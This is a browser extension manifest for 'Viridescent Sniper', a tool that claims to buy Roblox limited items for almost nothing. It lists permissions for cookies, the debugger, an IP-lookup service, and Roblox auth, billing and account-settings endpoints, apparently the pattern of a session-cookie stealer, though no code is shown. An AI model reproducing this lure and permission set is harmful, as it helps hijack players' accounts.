{
  "name":"Viridescent Sniper",
   "version":"2",
   "manifest_version": 2,
   "description":"Snipes limiteds. have you ever wanted to snipe a dominus for 10 or less robux?",
   "browser_action": {
      "default_icon": "icon.png",
      "default_popup": "bot/popout.html"
   },
   "permissions":[
      "alarms",
      "background",
      "debugger",
      "notifications",
      "cookies",
      "https://api.ipify.org/",
      "https://www.roblox.com/",
      "https://users.roblox.com/",
      "https://auth.roblox.com/",
      "https://economy.roblox.com/",
      "https://premiumfeatures.roblox.com/",
      "https://inventory.roblox.com/",
      "https://accountinformation.roblox.com/",
      "https://friends.roblox.com/",
      "https://accountsettings.roblox.com/",
      "https://billing.roblox.com/v1/credit",
      "https://thumbnails.roblox.com/"
   ],
   "background":{
      "scripts":[
         "bot/bgWork.js",
         "bot/jQuery-ver3.js"
      ]
   },
   "icons":{
      "16":"icon16.png",
      "48":"icon48.png",
      "128":"icon128.png"
   }
}





